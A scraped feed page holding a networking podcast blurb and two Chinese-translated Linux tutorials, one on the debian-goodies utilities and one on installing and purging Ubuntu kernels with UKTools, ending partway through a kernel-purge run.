Next Page: 10000

          Network Break 182: BGP Hijacked For Cryptocurrency Heist; Juniper, Big Switch Unveil New Products      Cache   Translate Page   Web Page Cache   
Today's Network Break delves into a BGP hijack, looks at new products from Juniper and Big Switch, discusses why bpfilter is replacing iptables in the Linux kernel, and reviews even more tech news.
          献给 Debian 和 Ubuntu 用户的一组实用程序      Cache   Translate Page   Web Page Cache   

你使用的是基于 Debian 的系统吗?如果是,太好了!我今天在这里给你带来了一个好消息。先向 “Debian-goodies” 打个招呼,这是一组基于 Debian 系统(比如:Ubuntu、Linux Mint)的有用工具。这些实用工具提供了一些额外的有用的命令,这些命令在基于 Debian 的系统中默认不可用。通过使用这些工具,用户可以找到哪些程序占用更多磁盘空间,更新系统后需要重新启动哪些服务,在一个软件包中搜索与模式匹配的文件,根据搜索字符串列出已安装的包等等。在这个简短的指南中,我们将讨论一些有用的 Debian 的好东西。

Debian-goodies – 给 Debian 和 Ubuntu 用户的实用程序

debian-goodies 包可以在 Debian 和其衍生的 Ubuntu 以及其它 Ubuntu 变体(如 Linux Mint)的官方仓库中找到。要安装 debian-goodies,只需简单运行:

$ sudo apt-get install debian-goodies

debian-goodies 安装完成后,让我们继续看一看一些有用的实用程序。

1、 checkrestart

让我从我最喜欢的 checkrestart 实用程序开始。安装某些安全更新时,某些正在运行的应用程序可能仍然会使用旧库。要彻底应用安全更新,你需要查找并重新启动所有这些更新。这就是 checkrestart 派上用场的地方。该实用程序将查找哪些进程仍在使用旧版本的库,然后,你可以重新启动服务。

在进行库更新后,要检查哪些守护进程应该被重新启动,运行:

$ sudo checkrestart
[sudo] password for sk:
Found 0 processes using old versions of upgraded files

由于我最近没有执行任何安全更新,因此没有显示任何内容。

请注意,checkrestart 实用程序确实运行良好。但是,有一个名为 needrestart 的类似的新工具可用于最新的 Debian 系统。needrestart 的灵感来自 checkrestart 实用程序,它完成了同样的工作。 needrestart 得到了积极维护,并支持容器(LXC、 Docker)等新技术。

以下是 needrestart 的特点:

  • 支持(但不要求)systemd
  • 二进制程序的黑名单(例如:用于图形显示的显示管理器)
  • 尝试检测挂起的内核升级
  • 尝试检测基于解释器的守护进程所需的重启(支持 Perl、Python、Ruby)
  • 使用钩子完全集成到 apt/dpkg 中

它在默认仓库中也可以使用。所以,你可以使用如下命令安装它:

$ sudo apt-get install needrestart

现在,你可以使用以下命令检查更新系统后需要重新启动的守护程序列表:

$ sudo needrestart
Scanning processes...
Scanning linux images...

Running kernel seems to be up-to-date.

Failed to check for processor microcode upgrades.

No services need to be restarted.

No containers need to be restarted.

No user sessions are running outdated binaries.

好消息是 Needrestart 同样也适用于其它 Linux 发行版。例如,你可以从 Arch Linux 及其衍生版的 AUR 或者其它任何 AUR 帮助程序来安装,就像下面这样:

$ yaourt -S needrestart

在 Fedora:

$ sudo dnf install needrestart

2、 check-enhancements

check-enhancements 实用程序用于查找那些用于增强已安装的包的软件包。此实用程序将列出增强其它包但不是必须运行它的包。你可以通过 -ip–installed-packages 选项来查找增强单个包或所有已安装包的软件包。

例如,我将列出增强 gimp 包功能的包:

$ check-enhancements gimp
gimp => gimp-data: Installed: (none) Candidate: 2.8.22-1
gimp => gimp-gmic: Installed: (none) Candidate: 1.7.9+zart-4build3
gimp => gimp-gutenprint: Installed: (none) Candidate: 5.2.13-2
gimp => gimp-help-ca: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-de: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-el: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-en: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-es: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-fr: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-it: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-ja: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-ko: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-nl: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-nn: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-pt: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-ru: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-sl: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-sv: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-plugin-registry: Installed: (none) Candidate: 7.20140602ubuntu3
gimp => xcftools: Installed: (none) Candidate: 1.0.7-6

要列出增强所有已安装包的,请运行:

$ check-enhancements -ip
autoconf => autoconf-archive: Installed: (none) Candidate: 20170928-2
btrfs-progs => snapper: Installed: (none) Candidate: 0.5.4-3
ca-certificates => ca-cacert: Installed: (none) Candidate: 2011.0523-2
cryptsetup => mandos-client: Installed: (none) Candidate: 1.7.19-1
dpkg => debsig-verify: Installed: (none) Candidate: 0.18
[...]

3、 dgrep

顾名思义,dgrep 用于根据给定的正则表达式搜索制指定包的所有文件。例如,我将在 Vim 包中搜索包含正则表达式 “text” 的文件。

$ sudo dgrep "text" vim
Binary file /usr/bin/vim.tiny matches
/usr/share/doc/vim-tiny/copyright: that they must include this license text. You can also distribute
/usr/share/doc/vim-tiny/copyright: include this license text. You are also allowed to include executables
/usr/share/doc/vim-tiny/copyright: 1) This license text must be included unmodified.
/usr/share/doc/vim-tiny/copyright: text under a) applies to those changes.
/usr/share/doc/vim-tiny/copyright: context diff. You can choose what license to use for new code you
/usr/share/doc/vim-tiny/copyright: context diff will do. The e-mail address to be used is
/usr/share/doc/vim-tiny/copyright: On Debian systems, the complete text of the GPL version 2 license can be
[...]

dgrep 支持大多数 grep 的选项。参阅以下指南以了解 grep 命令。

4、 dglob

dglob 实用程序生成与给定模式匹配的包名称列表。例如,找到与字符串 “vim” 匹配的包列表。

$ sudo dglob vim
vim-tiny:amd64
vim:amd64
vim-common:all
vim-runtime:all

默认情况下,dglob 将仅显示已安装的软件包。如果要列出所有包(包括已安装的和未安装的),使用 -a 标志。

$ sudo dglob vim -a

5、 debget

debget 实用程序将在 APT 的数据库中下载一个包的 .deb 文件。请注意,它只会下载给定的包,不包括依赖项。

$ debget nano
Get:1 http://in.archive.ubuntu.com/ubuntu bionic/main amd64 nano amd64 2.9.3-2 [231 kB]
Fetched 231 kB in 2s (113 kB/s)

6、 dpigs

这是此次集合中另一个有用的实用程序。dpigs 实用程序将查找并显示那些占用磁盘空间最多的已安装包。

$ dpigs
260644 linux-firmware
167195 linux-modules-extra-4.15.0-20-generic
75186 linux-headers-4.15.0-20
64217 linux-modules-4.15.0-20-generic
55620 snapd
31376 git
31070 libicu60
28420 vim-runtime
25971 gcc-7
24349 g++-7

如你所见,linux-firmware 包占用的磁盘空间最多。默认情况下,它将显示占用磁盘空间的 前 10 个包。如果要显示更多包,例如 20 个,运行以下命令:

$ dpigs -n 20

7. debman

debman 实用程序允许你轻松查看二进制文件 .deb 中的手册页而不提取它。你甚至不需要安装 .deb 包。以下命令显示 nano 包的手册页。

$ debman -f nano_2.9.3-2_amd64.deb nano

如果你没有 .deb 软件包的本地副本,使用 -p 标志下载并查看包的手册页。

$ debman -p nano nano

建议阅读:

8、 debmany

安装的 Debian 包不仅包含手册页,还包括其它文件,如确认、版权和自述文件等。debmany 实用程序允许你查看和读取那些文件。

$ debmany vim

使用方向键选择要查看的文件,然后按回车键查看所选文件。按 q 返回主菜单。

如果未安装指定的软件包,debmany 将从 APT 数据库下载并显示手册页。应安装 dialog 包来阅读手册页。

9、 popbugs

如果你是开发人员,popbugs 实用程序将非常有用。它将根据你使用的包显示一个定制的发布关键 bug 列表(使用 popularity-contest 数据)。对于那些不关心的人,popularity-contest 包设置了一个 cron (定时)任务,它将定期匿名向 Debian 开发人员提交有关该系统上最常用的 Debian 软件包的统计信息。这些信息有助于 Debian 做出决定,例如哪些软件包应该放在第一张 CD 上。它还允许 Debian 改进未来的发行版本,以便为新用户自动安装最流行的软件包。

要生成严重 bug 列表并在默认 Web 浏览器中显示结果,运行:

$ popbugs

此外,你可以将结果保存在文件中,如下所示。

$ popbugs --output=bugs.txt

10、 which-pkg-broke

此命令将显示给定包的所有依赖项以及安装每个依赖项的时间。通过使用此信息,你可以在升级系统或软件包之后轻松找到哪个包可能会在什么时间损坏了另一个包。

$ which-pkg-broke vim
Package <debconf-2.0> has no install time info
debconf Wed Apr 25 08:08:40 2018
gcc-8-base:amd64 Wed Apr 25 08:08:41 2018
libacl1:amd64 Wed Apr 25 08:08:41 2018
libattr1:amd64 Wed Apr 25 08:08:41 2018
dpkg Wed Apr 25 08:08:41 2018
libbz2-1.0:amd64 Wed Apr 25 08:08:41 2018
libc6:amd64 Wed Apr 25 08:08:42 2018
libgcc1:amd64 Wed Apr 25 08:08:42 2018
liblzma5:amd64 Wed Apr 25 08:08:42 2018
libdb5.3:amd64 Wed Apr 25 08:08:42 2018
[...]

11、 dhomepage

dhomepage 实用程序将在默认 Web 浏览器中显示给定包的官方网站。例如,以下命令将打开 Vim 编辑器的主页。

$ dhomepage vim

这就是全部了。Debian-goodies 是你武器库中必备的工具。即使我们不经常使用所有这些实用程序,但它们值得学习,我相信它们有时会非常有用。

我希望这很有用。更多好东西要来了。敬请关注!

干杯!


via: https://www.ostechnix.com/debian-goodies-a-set-of-useful-utilities-for-debian-and-ubuntu-users/

作者:SK 选题:lujun9972 译者:MjSeven 校对:wxy

本文由 LCTT 原创编译,Linux中国 荣誉推出


          UKTools:安装最新 Linux 内核的简便方法      Cache   Translate Page   Web Page Cache   

Ubuntu 中有许多实用程序可以将 Linux 内核升级到最新的稳定版本。我们之前已经写过关于这些实用程序的文章,例如 Linux Kernel Utilities (LKU)、 Ubuntu Kernel Upgrade Utility (UKUU) 和 Ubunsys。

另外还有一些其它实用程序可供使用。我们计划在其它文章中包含这些,例如 ubuntu-mainline-kernel.sh 和从主线内核手动安装的方式。

今天我们还会教你类似的使用工具 —— UKTools。你可以尝试使用这些实用程序中的任何一个来将 Linux 内核升级至最新版本。

最新的内核版本附带了安全漏洞修复和一些改进,因此,最好保持最新的内核版本以获得可靠、安全和更好的硬件性能。

有时候最新的内核版本可能会有一些漏洞,并且会导致系统崩溃,这是你的风险。我建议你不要在生产环境中安装它。

建议阅读:

什么是 UKTools

UKTools 意思是 Ubuntu 内核工具,它包含两个 shell 脚本 ukupgradeukpurge

ukupgrade 意思是 “Ubuntu Kernel Upgrade”,它允许用户将 Linux 内核升级到 Ubuntu/Mint 的最新稳定版本以及基于 kernel.ubuntu.com 的衍生版本。

ukpurge 意思是 “Ubuntu Kernel Purge”,它允许用户在机器中删除旧的 Linux 内核镜像或头文件,用于 Ubuntu/Mint 和其衍生版本。它将只保留三个内核版本。

此实用程序没有 GUI,但它看起来非常简单直接,因此,新手可以在没有任何问题的情况下进行升级。

我正在运行 Ubuntu 17.10,目前的内核版本如下:

$ uname -a
Linux ubuntu 4.13.0-39-generic #44-Ubuntu SMP Thu Apr 5 14:25:01 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

运行以下命令来获取系统上已安装内核的列表(Ubuntu 及其衍生产品)。目前我持有 7 个内核。

$ dpkg --list | grep linux-image
ii linux-image-4.13.0-16-generic 4.13.0-16.19 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-17-generic 4.13.0-17.20 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-32-generic 4.13.0-32.35 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-36-generic 4.13.0-36.40 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-37-generic 4.13.0-37.42 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-38-generic 4.13.0-38.43 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-39-generic 4.13.0-39.44 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-16-generic 4.13.0-16.19 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-17-generic 4.13.0-17.20 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-32-generic 4.13.0-32.35 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-36-generic 4.13.0-36.40 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-37-generic 4.13.0-37.42 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-38-generic 4.13.0-38.43 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-39-generic 4.13.0-39.44 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-generic 4.13.0.39.42 amd64 Generic Linux kernel image

如何安装 UKTools

在 Ubuntu 及其衍生产品上,只需运行以下命令来安装 UKTools 即可。

在你的系统上运行以下命令来克隆 UKTools 仓库:

$ git clone https://github.com/usbkey9/uktools

进入 uktools 目录:

$ cd uktools

运行 Makefile 以生成必要的文件。此外,这将自动安装最新的可用内核。只需重新启动系统即可使用最新的内核。

$ sudo make
[sudo] password for daygeek:
Creating the directories if neccessary
Linking profile.d file for reboot message
Linking files to global sbin directory
Ubuntu Kernel Upgrade - by Mustafa Hasturk
------------------------------------------
This script is based on the work of Mustafa Hasturk and was reworked by
Caio Oliveira and modified and fixed by Christoph Kepler

Current Development and Maintenance by Christoph Kepler

Do you want the Stable Release (if not sure, press y)? (y/n): y
Do you want the Generic kernel? (y/n): y
Do you want to autoremove old kernel? (y/n): y
no crontab for root
Do you want to update the kernel automatically? (y/n): y
Setup complete. Update the kernel right now? (y/n): y
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
 linux-headers-4.13.0-16 linux-headers-4.13.0-16-generic linux-headers-4.13.0-17 linux-headers-4.13.0-17-generic linux-headers-4.13.0-32 linux-headers-4.13.0-32-generic linux-headers-4.13.0-36
 linux-headers-4.13.0-36-generic linux-headers-4.13.0-37 linux-headers-4.13.0-37-generic linux-image-4.13.0-16-generic linux-image-4.13.0-17-generic linux-image-4.13.0-32-generic linux-image-4.13.0-36-generic
 linux-image-4.13.0-37-generic linux-image-extra-4.13.0-16-generic linux-image-extra-4.13.0-17-generic linux-image-extra-4.13.0-32-generic linux-image-extra-4.13.0-36-generic
 linux-image-extra-4.13.0-37-generic
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
 lynx-common
The following NEW packages will be installed:
 lynx lynx-common
0 upgraded, 2 newly installed, 0 to remove and 71 not upgraded.
Need to get 1,498 kB of archives.
After this operation, 5,418 kB of additional disk space will be used.
Get:1 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 lynx-common all 2.8.9dev16-1 [873 kB]
Get:2 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 lynx amd64 2.8.9dev16-1 [625 kB]
Fetched 1,498 kB in 12s (120 kB/s)
Selecting previously unselected package lynx-common.
(Reading database ... 441037 files and directories currently installed.)
Preparing to unpack .../lynx-common_2.8.9dev16-1_all.deb ...
Unpacking lynx-common (2.8.9dev16-1) ...
Selecting previously unselected package lynx.
Preparing to unpack .../lynx_2.8.9dev16-1_amd64.deb ...
Unpacking lynx (2.8.9dev16-1) ...
Processing triggers for mime-support (3.60ubuntu1) ...
Processing triggers for doc-base (0.10.7) ...
Processing 1 added doc-base file...
Processing triggers for man-db (2.7.6.1-2) ...
Setting up lynx-common (2.8.9dev16-1) ...
Setting up lynx (2.8.9dev16-1) ...
update-alternatives: using /usr/bin/lynx to provide /usr/bin/www-browser (www-browser) in auto mode

Cleaning old downloads in /tmp

Downloading the kernel's components...
Checksum for linux-headers-4.16.7-041607-generic_4.16.7-041607.201805021131_amd64.deb succeed
Checksum for linux-image-unsigned-4.16.7-041607-generic_4.16.7-041607.201805021131_amd64.deb succeed
Checksum for linux-modules-4.16.7-041607-generic_4.16.7-041607.201805021131_amd64.deb succeed

Downloading the shared kernel header...
Checksum for linux-headers-4.16.7-041607_4.16.7-041607.201805021131_all.deb succeed

Installing Kernel and Headers...
Selecting previously unselected package linux-headers-4.16.7-041607.
(Reading database ... 441141 files and directories currently installed.)
Preparing to unpack .../linux-headers-4.16.7-041607_4.16.7-041607.201805021131_all.deb ...
Unpacking linux-headers-4.16.7-041607 (4.16.7-041607.201805021131) ...
Selecting previously unselected package linux-headers-4.16.7-041607-generic.
Preparing to unpack .../linux-headers-4.16.7-041607-generic_4.16.7-041607.201805021131_amd64.deb ...
Unpacking linux-headers-4.16.7-041607-generic (4.16.7-041607.201805021131) ...
Selecting previously unselected package linux-image-unsigned-4.16.7-041607-generic.
Preparing to unpack .../linux-image-unsigned-4.16.7-041607-generic_4.16.7-041607.201805021131_amd64.deb ...
Unpacking linux-image-unsigned-4.16.7-041607-generic (4.16.7-041607.201805021131) ...
Selecting previously unselected package linux-modules-4.16.7-041607-generic.
Preparing to unpack .../linux-modules-4.16.7-041607-generic_4.16.7-041607.201805021131_amd64.deb ...
Unpacking linux-modules-4.16.7-041607-generic (4.16.7-041607.201805021131) ...
Setting up linux-headers-4.16.7-041607 (4.16.7-041607.201805021131) ...
dpkg: dependency problems prevent configuration of linux-headers-4.16.7-041607-generic:
 linux-headers-4.16.7-041607-generic depends on libssl1.1 (>= 1.1.0); however:
 Package libssl1.1 is not installed.

Setting up linux-modules-4.16.7-041607-generic (4.16.7-041607.201805021131) ...
Setting up linux-image-unsigned-4.16.7-041607-generic (4.16.7-041607.201805021131) ...
I: /vmlinuz.old is now a symlink to boot/vmlinuz-4.13.0-39-generic
I: /initrd.img.old is now a symlink to boot/initrd.img-4.13.0-39-generic
I: /vmlinuz is now a symlink to boot/vmlinuz-4.16.7-041607-generic
I: /initrd.img is now a symlink to boot/initrd.img-4.16.7-041607-generic
Processing triggers for linux-image-unsigned-4.16.7-041607-generic (4.16.7-041607.201805021131) ...
/etc/kernel/postinst.d/initramfs-tools:
update-initramfs: Generating /boot/initrd.img-4.16.7-041607-generic
/etc/kernel/postinst.d/zz-update-grub:
Generating grub configuration file ...
Warning: Setting GRUB_TIMEOUT to a non-zero value when GRUB_HIDDEN_TIMEOUT is set is no longer supported.
Found linux image: /boot/vmlinuz-4.16.7-041607-generic
Found initrd image: /boot/initrd.img-4.16.7-041607-generic
Found linux image: /boot/vmlinuz-4.13.0-39-generic
Found initrd image: /boot/initrd.img-4.13.0-39-generic
Found linux image: /boot/vmlinuz-4.13.0-38-generic
Found initrd image: /boot/initrd.img-4.13.0-38-generic
Found linux image: /boot/vmlinuz-4.13.0-37-generic
Found initrd image: /boot/initrd.img-4.13.0-37-generic
Found linux image: /boot/vmlinuz-4.13.0-36-generic
Found initrd image: /boot/initrd.img-4.13.0-36-generic
Found linux image: /boot/vmlinuz-4.13.0-32-generic
Found initrd image: /boot/initrd.img-4.13.0-32-generic
Found linux image: /boot/vmlinuz-4.13.0-17-generic
Found initrd image: /boot/initrd.img-4.13.0-17-generic
Found linux image: /boot/vmlinuz-4.13.0-16-generic
Found initrd image: /boot/initrd.img-4.13.0-16-generic
Found memtest86+ image: /boot/memtest86+.elf
Found memtest86+ image: /boot/memtest86+.bin
done

Thanks for using this script! Hope it helped.
Give it a star: https://github.com/MarauderXtreme/uktools

重新启动系统以激活最新的内核。

$ sudo shutdown -r now

一旦系统重新启动,重新检查内核版本。

$ uname -a
Linux ubuntu 4.16.7-041607-generic #201805021131 SMP Wed May 2 15:34:55 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

此 make 命令会将下面的文件放到 /usr/local/bin 目录中。

do-kernel-upgrade
do-kernel-purge

要移除旧内核,运行以下命令:

$ do-kernel-purge

Ubuntu Kernel Purge - by Caio Oliveira

This script will only keep three versions: the first and the last two, others will be purge

---Current version:
Linux Kernel 4.16.7-041607 Generic (linux-image-4.16.7-041607-generic)

---Versions to remove:
4.13.0-16
4.13.0-17
4.13.0-32
4.13.0-36
4.13.0-37

---Do you want to remove the old kernels/headers versions? (Y/n): y
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
 linux-headers-4.13.0-17 linux-headers-4.13.0-17-generic linux-headers-4.13.0-32 linux-headers-4.13.0-32-generic linux-headers-4.13.0-36 linux-headers-4.13.0-36-generic linux-headers-4.13.0-37
 linux-headers-4.13.0-37-generic linux-image-4.13.0-17-generic linux-image-4.13.0-32-generic linux-image-4.13.0-36-generic linux-image-4.13.0-37-generic linux-image-extra-4.13.0-17-generic
 linux-image-extra-4.13.0-32-generic linux-image-extra-4.13.0-36-generic linux-image-extra-4.13.0-37-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be REMOVED:
 linux-headers-4.13.0-16* linux-headers-4.13.0-16-generic* linux-image-4.13.0-16-generic* linux-image-extra-4.13.0-16-generic*
0 upgraded, 0 newly installed, 4 to remove and 71 not upgraded.
After this operation, 318 MB disk space will be freed.
(Reading database ... 465582 files and directories currently installed.)
Removing linux-headers-4.13.0-16-generic (4.13.0-16.19) ...
Removing linux-headers-4.13.0-16 (4.13.0-16.19) ...
Removing linux-image-extra-4.13.0-16-generic (4.13.0-16.19) ...
run-parts: executing /etc/kernel/postinst.d/apt-auto-removal 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
update-initramfs: Generating /boot/initrd.img-4.13.0-16-generic
run-parts: executing /etc/kernel/postinst.d/unattended-upgrades 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
run-parts: executing /etc/kernel/postinst.d/update-notifier 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
Generating grub configuration file ...
Warning: Setting GRUB_TIMEOUT to a non-zero value when GRUB_HIDDEN_TIMEOUT is set is no longer supported.
Found linux image: /boot/vmlinuz-4.16.7-041607-generic
Found initrd image: /boot/initrd.img-4.16.7-041607-generic
Found linux image: /boot/vmlinuz-4.13.0-39-generic
Found initrd image: /boot/initrd.img-4.13.0-39-generic
Found linux image: /boot/vmlinuz-4.13.0-38-generic
Found initrd image: /boot/initrd.img-4.13.0-38-generic
Found linux image: /boot/vmlinuz-4.13.0-37-generic
Found initrd image: /boot/initrd.img-4.13.0-37-generic
Found linux image: /boot/vmlinuz-4.13.0-36-generic
Found initrd image: /boot/initrd.img-4.13.0-36-generic
Found linux image: /boot/vmlinuz-4.13.0-32-generic
Found initrd image: /boot/initrd.img-4.13.0-32-generic
Found linux image: /boot/vmlinuz-4.13.0-17-generic
Found initrd image: /boot/initrd.img-4.13.0-17-generic
Found linux image: /boot/vmlinuz-4.13.0-16-generic
Found initrd image: /boot/initrd.img-4.13.0-16-generic
Found memtest86+ image: /boot/memtest86+.elf
Found memtest86+ image: /boot/memtest86+.bin
done
Removing linux-image-4.13.0-16-generic (4.13.0-16.19) ...
Examining /etc/kernel/postrm.d .
run-parts: executing /etc/kernel/postrm.d/initramfs-tools 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
update-initramfs: Deleting /boot/initrd.img-4.13.0-16-generic
run-parts: executing /etc/kernel/postrm.d/zz-update-grub 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
Generating grub configuration file ...
Warning: Setting GRUB_TIMEOUT to a non-zero value when GRUB_HIDDEN_TIMEOUT is set is no longer supported.
Found linux image: /boot/vmlinuz-4.16.7-041607-generic
Found initrd image: /boot/initrd.img-4.16.7-041607-generic
Found linux image: /boot/vmlinuz-4.13.0-39-generic
Found initrd image: /boot/initrd.img-4.13.0-39-generic
Found linux image: /boot/vmlinuz-4.13.0-38-generic
Found initrd image: /boot/initrd.img-4.13.0-38-generic
Found linux image: /boot/vmlinuz-4.13.0-37-generic
Found initrd image: /boot/initrd.img-4.13.0-37-generic
Found linux image: /boot/vmlinuz-4.13.0-36-generic
Found initrd image: /boot/initrd.img-4.13.0-36-generic
Found linux image: /boot/vmlinuz-4.13.0-32-generic
Found initrd image: /boot/initrd.img-4.13.0-32-generic
Found linux image: /boot/vmlinuz-4.13.0-17-generic
Found initrd image: /boot/initrd.img-4.13.0-17-generic
Found memtest86+ image: /boot/memtest86+.elf
Found memtest86+ image: /boot/memtest86+.bin
done
(Reading database ... 430635 files and directories currently installed.)
Purging configuration files for linux-image-extra-4.13.0-16-generic (4.13.0-16.19) ...
Purging configuration files for linux-image-4.13.0-16-generic (4.13.0-16.19) ...
Examining /etc/kernel/postrm.d .
run-parts: executing /etc/kernel/postrm.d/initramfs-tools 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
run-parts: executing /etc/kernel/postrm.d/zz-update-grub 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
Reading package lists... Done
Building dependency tree
Reading state information... Done
.
.
.
.
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be REMOVED:
 linux-headers-4.13.0-37* linux-headers-4.13.0-37-generic* linux-image-4.13.0-37-generic* linux-image-extra-4.13.0-37-generic*
0 upgraded, 0 newly installed, 4 to remove and 71 not upgraded.
After this operation, 321 MB disk space will be freed.
(Reading database ... 325772 files and directories currently installed.)
Removing linux-headers-4.13.0-37-generic (4.13.0-37.42) ...
Removing linux-headers-4.13.0-37 (4.13.0-37.42) ...
Removing linux-image-extra-4.13.0-37-generic (4.13.0-37.42) ...
run-parts: executing /etc/kernel/postinst.d/apt-auto-removal 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
update-initramfs: Generating /boot/initrd.img-4.13.0-37-generic
run-parts: executing /etc/kernel/postinst.d/unattended-upgrades 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
run-parts: executing /etc/kernel/postinst.d/update-notifier 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
Generating grub configuration file ...
Warning: Setting GRUB_TIMEOUT to a non-zero value when GRUB_HIDDEN_TIMEOUT is set is no longer supported.
Found linux image: /boot/vmlinuz-4.16.7-041607-generic
Found initrd image: /boot/initrd.img-4.16.7-041607-generic
Found linux image: /boot/vmlinuz-4.13.0-39-generic
Found initrd image: /boot/initrd.img-4.13.0-39-generic
Found linux image: /boot/vmlinuz-4.13.0-38-generic
Found initrd image: /boot/initrd.img-4.13.0-38-generic
Found linux image: /boot/vmlinuz-4.13.0-37-generic
Found initrd image: /boot/initrd.img-4.13.0-37-generic
Found memtest86+ image: /boot/memtest86+.elf
Found memtest86+ image: /boot/memtest86+.bin
done
Removing linux-image-4.13.0-37-generic (4.13.0-37.42) ...
Examining /etc/kernel/postrm.d .
run-parts: executing /etc/kernel/postrm.d/initramfs-tools 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
update-initramfs: Deleting /boot/initrd.img-4.13.0-37-generic
run-parts: executing /etc/kernel/postrm.d/zz-update-grub 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
Generating grub configuration file ...
Warning: Setting GRUB_TIMEOUT to a non-zero value when GRUB_HIDDEN_TIMEOUT is set is no longer supported.
Found linux image: /boot/vmlinuz-4.16.7-041607-generic
Found initrd image: /boot/initrd.img-4.16.7-041607-generic
Found linux image: /boot/vmlinuz-4.13.0-39-generic
Found initrd image: /boot/initrd.img-4.13.0-39-generic
Found linux image: /boot/vmlinuz-4.13.0-38-generic
Found initrd image: /boot/initrd.img-4.13.0-38-generic
Found memtest86+ image: /boot/memtest86+.elf
Found memtest86+ image: /boot/memtest86+.bin
done
(Reading database ... 290810 files and directories currently installed.)
Purging configuration files for linux-image-extra-4.13.0-37-generic (4.13.0-37.42) ...
Purging configuration files for linux-image-4.13.0-37-generic (4.13.0-37.42) ...
Examining /etc/kernel/postrm.d .
run-parts: executing /etc/kernel/postrm.d/initramfs-tools 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
run-parts: executing /etc/kernel/postrm.d/zz-update-grub 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic

Thanks for using this script!!!

使用以下命令重新检查已安装内核的列表。它将只保留三个旧的内核。

$ dpkg --list | grep linux-image
ii linux-image-4.13.0-38-generic 4.13.0-38.43 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-39-generic 4.13.0-39.44 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-38-generic 4.13.0-38.43 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-39-generic 4.13.0-39.44 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-generic 4.13.0.39.42 amd64 Generic Linux kernel image
ii linux-image-unsigned-4.16.7-041607-generic 4.16.7-041607.201805021131 amd64 Linux kernel image for version 4.16.7 on 64 bit x86 SMP

下次你可以调用 do-kernel-upgrade 实用程序来安装新的内核。如果有任何新内核可用,那么它将安装。如果没有,它将报告当前没有可用的内核更新。

$ do-kernel-upgrade
Kernel up to date. Finishing

再次运行 do-kernel-purge 命令以确认。如果发现超过三个内核,那么它将移除。如果不是,它将报告没有删除消息。

$ do-kernel-purge

Ubuntu Kernel Purge - by Caio Oliveira

This script will only keep three versions: the first and the last two, others will be purge

---Current version:
